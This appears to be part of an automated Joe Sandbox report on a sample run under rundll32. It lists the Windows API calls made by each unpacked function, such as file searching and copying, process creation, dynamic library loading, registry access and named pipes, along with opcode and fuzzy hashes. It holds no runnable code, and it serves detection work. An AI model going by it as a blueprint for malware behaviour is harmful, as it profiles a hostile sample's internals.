                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04F62CA9
                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04F62CC7
                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 04F62CF3
                            • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 04F62D62
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62DDA
                            • wsprintfA.USER32 ref: 04F62DF6
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62E01
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62E18
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62EA4
                            • wsprintfA.USER32 ref: 04F62EBF
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62ECA
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62EE1
                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 04F62F03
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F62F1E
                            • wsprintfA.USER32 ref: 04F62F35
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F62F40
                              • Part of subcall function 04F63172: lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                              • Part of subcall function 04F63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                              • Part of subcall function 04F63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                              • Part of subcall function 04F63172: GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                              • Part of subcall function 04F63172: HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F62F57
                            • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06318A20), ref: 04F62F83
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                            • String ID:
                            • API String ID: 3130754786-0
                            • Opcode ID: cbc87164fd9cf0c63b4c94905609d6eb942e355241c4ab9bd94d0946cc79d09b
                            • Instruction ID: ddc196f110b9c6d390e3c47c8d1735378ab8e96a77e9c4827bde0fbfd36ef993
                            • Opcode Fuzzy Hash: cbc87164fd9cf0c63b4c94905609d6eb942e355241c4ab9bd94d0946cc79d09b
                            • Instruction Fuzzy Hash: 58A14AB1D00119FFDB11AF94EC84DBEBBB9FB08304B01446AF916AB250D7396D46EB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F71195 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?), ref: 04F711AA
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                              • Part of subcall function 04F7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                              • Part of subcall function 04F7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BCB9
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04F71206
                            • memcpy.NTDLL(00000000,?,00000000), ref: 04F71219
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F71230
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BD65
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BD77
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BD92
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 04F7125B
                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 04F71273
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F712CD
                            • lstrlenW.KERNEL32(00000000,?), ref: 04F712F0
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F71302
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 04F71376
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71386
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 04F713AF
                            • lstrlenW.KERNEL32(04F8B878,?), ref: 04F71429
                            • DeleteFileW.KERNEL32(?,?), ref: 04F71457
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71465
                            • HeapFree.KERNEL32(00000000,?), ref: 04F71486
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                            • String ID:
                            • API String ID: 72361108-0
                            • Opcode ID: 6b787fbbaf806654016881fea0394eb65344e22a1acf91662b5966303b6a9f9f
                            • Instruction ID: 049a63d580eb461e7f2169c0a6b2dfcdc403f43dac7cb7c41d020f16f761000b
                            • Opcode Fuzzy Hash: 6b787fbbaf806654016881fea0394eb65344e22a1acf91662b5966303b6a9f9f
                            • Instruction Fuzzy Hash: 2991F0B194021EFFDB11DFA4EC88CBA7BBCFB09354B04445AF605DB211D638A94ADB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77F79 Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F77F9B
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F77FB8
                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F78008
                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04F78012
                            • GetLastError.KERNEL32 ref: 04F7801C
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7802D
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04F7804F
                            • HeapFree.KERNEL32(00000000,?), ref: 04F78086
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F7809A
                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04F780A3
                            • SuspendThread.KERNEL32(?), ref: 04F780B2
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000), ref: 04F780C6
                            • SetEvent.KERNEL32(00000000), ref: 04F780D3
                            • CloseHandle.KERNEL32(00000000), ref: 04F780DA
                            • Sleep.KERNEL32(000001F4), ref: 04F780ED
                            • ResumeThread.KERNEL32(?), ref: 04F78111
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                            • String ID:
                            • API String ID: 1011176505-0
                            • Opcode ID: 727100b377aabf233769816e475ffe0f7591104ff2eceecfcffd28b44586dcd0
                            • Instruction ID: 88e6e997d163dd249b86160929d07ea3970794a7a8cac5d8ee8b8ae03fa3273a
                            • Opcode Fuzzy Hash: 727100b377aabf233769816e475ffe0f7591104ff2eceecfcffd28b44586dcd0
                            • Instruction Fuzzy Hash: F6410972D0014EFFDB10AFA4FC889BE7BB9FB04344B14546EE601AA110D73D6D969BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F65437 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F65465
                            • StrChrA.SHLWAPI(?,0000000D), ref: 04F654AB
                            • StrChrA.SHLWAPI(?,0000000A), ref: 04F654B8
                            • StrChrA.SHLWAPI(?,0000007C), ref: 04F654DF
                            • StrTrimA.SHLWAPI(?,04F85FCC), ref: 04F654F4
                            • StrChrA.SHLWAPI(?,0000003D), ref: 04F654FD
                            • StrTrimA.SHLWAPI(00000001,04F85FCC), ref: 04F65513
                            • _strupr.NTDLL ref: 04F6551A
                            • StrTrimA.SHLWAPI(?,?), ref: 04F65527
                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04F6556F
                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 04F6558E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                            • String ID: $;
                            • API String ID: 4019332941-73438061
                            • Opcode ID: 90285d6f6ea59c5f4560e05dc763ed1123bd4923911c5fb2e3ac33236c8a37b8
                            • Instruction ID: fb73582d910b169e3468cfc25fab5fbc9ce55538b853e5efd6e1f401219034bf
                            • Opcode Fuzzy Hash: 90285d6f6ea59c5f4560e05dc763ed1123bd4923911c5fb2e3ac33236c8a37b8
                            • Instruction Fuzzy Hash: 7E41D8B1904306AFD711EF28EC48B2BBBEAEF55304F04181DF4969B241DB74F9068B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F72DBB Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136timeCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 04F72DF8
                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 04F72E0C
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 04F72F37
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F72E38
                            • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F72E70
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                            • String ID: 0x%08X$W
                            • API String ID: 95801598-2600449260
                            • Opcode ID: 1558ea98b5208349ad3b8be187c7969e93a78986c9dd3c2f1ae3654b3e81ac5e
                            • Instruction ID: bc45c27f429e6b75a7cbb991dcf1c3edafc3e965d1c26eacc997ee434012a8ce
                            • Opcode Fuzzy Hash: 1558ea98b5208349ad3b8be187c7969e93a78986c9dd3c2f1ae3654b3e81ac5e
                            • Instruction Fuzzy Hash: 04517FB1A00209BFDB109F64DC45BAE7BE8FF08714F10851AF959DB280D7B8E645CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C01F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                            • wcstombs.NTDLL ref: 04F7C077
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                            • TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                            • GetLastError.KERNEL32 ref: 04F7C102
                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 04F7C122
                            • CloseHandle.KERNEL32(?), ref: 04F7C131
                            • CloseHandle.KERNEL32(?), ref: 04F7C136
                            • GetLastError.KERNEL32 ref: 04F7C13A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                            • String ID: D
                            • API String ID: 2463014471-2746444292
                            • Opcode ID: b967405ca727ef843ddefa5e0555c331a43798923914a6634181636501acfc18
                            • Instruction ID: 856d60f6177627707ce0c35f26c2eab4e0e165509920dbf55d374cd6a00301d0
                            • Opcode Fuzzy Hash: b967405ca727ef843ddefa5e0555c331a43798923914a6634181636501acfc18
                            • Instruction Fuzzy Hash: 13411D72D0015CBFEB11DFA4DD859EEBBB8EB08344F20406AE601B6100E6796E459B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F644A6 Relevance: 21.4, APIs: 14, Instructions: 391memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04F64526
                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04F64545
                            • GetLastError.KERNEL32 ref: 04F646F6
                            • GetLastError.KERNEL32 ref: 04F64778
                            • SwitchToThread.KERNEL32(?,?,?,?), ref: 04F647C1
                            • GetLastError.KERNEL32 ref: 04F64813
                            • GetLastError.KERNEL32 ref: 04F64822
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F64832
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F64843
                            • RtlExitUserThread.NTDLL(?), ref: 04F64851
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F648C0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F64911
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 04F64946
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 04F64956
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                            • String ID:
                            • API String ID: 2794784202-0
                            • Opcode ID: 5aa2622f0e983bfcf589f5aaeacac1b874732dd1b10eb325922aec58206b5a25
                            • Instruction ID: d6b862d17983007ad62e8f2b6125198ba42a1d35ca9d6a9d8981c2a3336373ed
                            • Opcode Fuzzy Hash: 5aa2622f0e983bfcf589f5aaeacac1b874732dd1b10eb325922aec58206b5a25
                            • Instruction Fuzzy Hash: 58E15BB1900249AFEB20AF60DC88EBA7BB9FF08304F104529F91AD7151E775AD56CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6BFF0 Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C03F
                            • StrTrimA.SHLWAPI(00000001,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 04F6C058
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C063
                            • StrTrimA.SHLWAPI(00000001,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 04F6C07C
                            • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 04F6C11F
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F6C141
                            • lstrcpy.KERNEL32(00000020,?), ref: 04F6C160
                            • lstrlen.KERNEL32(?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 04F6C16A
                            • memcpy.NTDLL(?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 04F6C1AB
                            • memcpy.NTDLL(?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 04F6C1BE
                            • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057), ref: 04F6C1E2
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,04F785F1,?,00000000,0000001E), ref: 04F6C201
                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?), ref: 04F6C227
                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,04F785F1,?,00000000,0000001E,00000001,00000057,?), ref: 04F6C243
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                            • String ID:
                            • API String ID: 3323474148-0
                            • Opcode ID: 442335ce0e9e6183b84385b77ddfc79278b7406d6c342a82243da0e89ab49798
                            • Instruction ID: 8f861e62862408589e148ab9d5846fb26549374c9086bbbd595018a4e721e294
                            • Opcode Fuzzy Hash: 442335ce0e9e6183b84385b77ddfc79278b7406d6c342a82243da0e89ab49798
                            • Instruction Fuzzy Hash: 6B716B72904345AFD721DF24DC44A6ABBE8FF48304F04492EFADAD7250D734E9468B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F705BC Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,?,00000000), ref: 04F705D3
                            • lstrlen.KERNEL32(?,?,00000000), ref: 04F705DA
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F705F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F70602
                            • lstrcat.KERNEL32(?,?), ref: 04F7061E
                            • lstrcat.KERNEL32(?,?), ref: 04F7062F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F70640
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F706DD
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 04F70716
                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 04F7072F
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04F70739
                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04F70749
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F70762
                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 04F70772
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                            • String ID:
                            • API String ID: 333890978-0
                            • Opcode ID: 2720c3cbc98542974e584170ce4d81bfa08b5f20c8b8fc6e3df95ff953921281
                            • Instruction ID: a0c4c228e4f38d75b2b5394aaaa80c7a65562daa3a74def3f1d5371793777a51
                            • Opcode Fuzzy Hash: 2720c3cbc98542974e584170ce4d81bfa08b5f20c8b8fc6e3df95ff953921281
                            • Instruction Fuzzy Hash: FB517C7680014DBFDB019FA4EC84CBE7BBDEF48344B15846AFA15AB110D639AE46DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7AFC2 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,00000000,?,?,?,04F6663D,?,?), ref: 04F7AFCF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04F6663D,?,?), ref: 04F7AFF8
                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04F7B018
                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04F7B034
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B040
                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,04F6663D,?,?), ref: 04F7B043
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B04F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B06C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B086
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B09C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0B2
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0C8
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0DE
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,04F6663D,?,?), ref: 04F7B107
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                            • String ID:
                            • API String ID: 3772355505-0
                            • Opcode ID: dfb1fb3fd8ae0cb1f0a040b8567d8e17e15be1af13d231dde1f4bc06bd736748
                            • Instruction ID: d7ccad946a2d54521162e9961085ad0814a5a9ced44ab4305b9a3ad70cc29ab3
                            • Opcode Fuzzy Hash: dfb1fb3fd8ae0cb1f0a040b8567d8e17e15be1af13d231dde1f4bc06bd736748
                            • Instruction Fuzzy Hash: A83108B1A0461BBFD711DF64EC84D667BECEF05358B04846AF905CB251EB78E8058BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D016 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D02D
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D038
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D040
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6D055
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6D066
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F6D078
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D07D
                            • lstrcatW.KERNEL32(00000000,04F853E0), ref: 04F6D089
                            • lstrcatW.KERNEL32(00000000), ref: 04F6D092
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D097
                            • lstrcatW.KERNEL32(00000000,04F853E0), ref: 04F6D0A3
                            • lstrcatW.KERNEL32(00000000,00000002), ref: 04F6D0BF
                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D0C7
                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04F71453,?,?,?), ref: 04F6D0D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                            • String ID:
                            • API String ID: 3635185113-0
                            • Opcode ID: 34bc933e104d653131cbcf64a25acd044a0525d7de1d8624555aa173f4a09936
                            • Instruction ID: fca63d46680c4cf6f9f453d49a1c9e9d3660ddff2e4235e4f36e8b07c5caf0df
                            • Opcode Fuzzy Hash: 34bc933e104d653131cbcf64a25acd044a0525d7de1d8624555aa173f4a09936
                            • Instruction Fuzzy Hash: 0921A13260021ABFD3216F64EC84E7FBBB8EF85B45F11051EF5069A110CB68AC069AA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E19A Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F67A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04F67AA6
                              • Part of subcall function 04F67A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04F67ABE
                              • Part of subcall function 04F67A61: WaitForSingleObject.KERNEL32(00000000,?,04F787CC,?,?), ref: 04F67B86
                              • Part of subcall function 04F67A61: HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BAF
                              • Part of subcall function 04F67A61: HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BBF
                              • Part of subcall function 04F67A61: RegCloseKey.ADVAPI32(?,?,04F787CC,?,?), ref: 04F67BC8
                            • lstrcmp.KERNEL32(?,00000000), ref: 04F7E211
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04F6399C,00000000,00000000), ref: 04F7E23D
                            • GetCurrentThreadId.KERNEL32 ref: 04F7E2EE
                            • GetCurrentThread.KERNEL32 ref: 04F7E2FF
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,04F6399C,00000001,7620F730,00000000,00000000), ref: 04F7E33C
                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,04F6399C,00000001,7620F730,00000000,00000000), ref: 04F7E350
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F7E35E
                            • wsprintfA.USER32 ref: 04F7E376
